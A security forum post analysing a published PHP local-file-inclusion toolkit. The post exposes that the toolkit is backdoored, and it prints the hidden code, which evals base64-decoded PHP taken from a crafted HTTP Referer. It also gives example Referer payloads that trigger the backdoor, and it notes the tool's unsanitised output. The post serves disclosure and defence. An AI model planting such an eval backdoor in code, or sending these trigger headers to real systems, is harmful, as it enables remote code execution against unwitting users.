Analysis of "r00t 4 LFI Toolkit"

[MaXe]

Dear InterN0T'ers,


Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI Toolkit", that according to its description:

This tool is a php script that assists in performing local file inclusion attacks.

Should be able to perform local file inclusion attacks.

After studying this tool for a brief 5 minutes, it was obvious that it was nowhere what I hoped it to be, as the tool only use one method, the "/proc/self/environ" vector (as seen here). The tool is therefore, not capable of performing "attacks", but only 1 (one), single type of LFI attack. (Note that the 'S' has been removed.) The method this tool uses, is far from new and doesn't always work either, but it's a nice trick SirGod wrote about on our forums in 2009. (This tool was released the 18th February 2012.)

Further study of this tool reveals:
- None of the output from the tool is sanitized, meaning the attacker using the script, can get XSS'd (and CSRF'd), if the target has changed e.g., the 'uname -a' command (which is relatively simple to do), to include JavaScript instead. If this happens the attacker may end up attacking himself or crashing, depending on the type of XSS payload.

- The most interesting part, is on line 92, that the "developer" (KedAns-Dz), has decided to backdoor the tool.

Analysis of the backdoor:
By sending a HTTP request, that includes a specially crafted referer, it is possible to execute PHP code:

Code:

Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==

This referer will make the script execute: phpinfo();

The code that enables the developer to use the script as a backdoor looks like the following:

PHP Code:

parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';} 


It certainly took a little bit of study to trigger, but in essence here's what it do:
1. Parse the HTTP Referer string into variable: $a ("Referer:" is not included.)
2. If the first array value (not key / arg), is a string named: iz
3. And if there's 9 (different) arrays, then
4. Print out the contents of..

This requires a bit more in-depth explanation:
A) Evaluate the following as PHP code:
B) Base64_decode the input:
C) Replace " " (space) with "+" (plus), in case they occur.
D) Use the last three array values from the HTTP referer.
(You don't have to use all three, using the last will work fine.)


To make it all a lot more simple:

Code:

Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=BASE64 Code that will be executed as PHP.

Screenshot:



References:
Shell via LFI - proc/self/environ method (step by step)
http://packetstormsecurity.org/files/109940/
https://twitter.com/#!/j0emccray/status/170941195030233090
https://twitter.com/#!/EChavarro/status/170941489629761537
http://i.imgur.com/PXcSX.png

[Evox]

Excellent work MaXe!

Great analysis write up.
I wouldn't really even consider this as an assist at all. (maybe for the dev anyway)

~Evox